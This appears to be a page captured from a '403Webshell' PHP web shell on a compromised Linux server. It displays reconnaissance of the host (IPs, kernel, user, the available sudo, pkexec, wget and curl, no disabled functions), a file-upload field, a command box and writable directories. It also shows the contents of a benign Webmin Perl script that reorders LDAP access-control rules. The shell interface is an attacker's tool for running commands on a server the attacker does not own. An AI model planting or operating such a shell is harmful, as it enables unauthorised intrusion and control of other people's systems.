403Webshell
Server IP : 172.67.134.114  /  Your IP : 162.159.115.41
Web Server : Apache/2.4.37
System : Linux almalinux.duckdns.org 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User : ricodeal ( 1046)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/libexec/webmin/ldap-server/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/libexec/webmin/ldap-server/down_acl.cgi
#!/usr/bin/perl
# Move an access control rule down (later)

require './ldap-server-lib.pl';
&local_ldap_server() == 1 || &error($text{'slapd_elocal'});
$access{'acl'} || &error($text{'acl_ecannot'});
&ReadParse();

&lock_slapd_files();

if (&get_config_type() == 1) {
	# Move down in old-style config
	$conf = &get_config();
	@access = &find("access", $conf);
	($access[$in{'idx'}+1], $access[$in{'idx'}]) =
		($access[$in{'idx'}], $access[$in{'idx'}+1]);
	&save_directive($conf, "access", @access);
	&flush_file_lines($config{'config_file'});
	}
else {
	# Move down in LDIF config
	$defdb = &get_default_db();
	$conf = &get_ldif_config();
	@access = &find_ldif("olcAccess", $conf, $defdb);
	($access[$in{'idx'}+1], $access[$in{'idx'}]) =
		($access[$in{'idx'}], $access[$in{'idx'}+1]);
	if ($access[$in{'idx'}]->{'values'}->[0] =~ /^\{\d+\}to/ &&
	    $access[$in{'idx'}+1]->{'values'}->[0] =~ /^\{\d+\}to/) {
		# Swap indexes too
		($access[$in{'idx'}]->{'values'}->[0],
		 $access[$in{'idx'}+1]->{'values'}->[0]) = 
			($access[$in{'idx'}+1]->{'values'}->[0],
			 $access[$in{'idx'}]->{'values'}->[0]);
		}
	&save_ldif_directive($conf, "olcAccess", $defdb, @access);
	&flush_file_lines();
	}

&unlock_slapd_files();

&webmin_log("down", "access", $p->{'what'});
&redirect("edit_acl.cgi");


Youez - 2016 - github.com/yon3zu
LinuXploit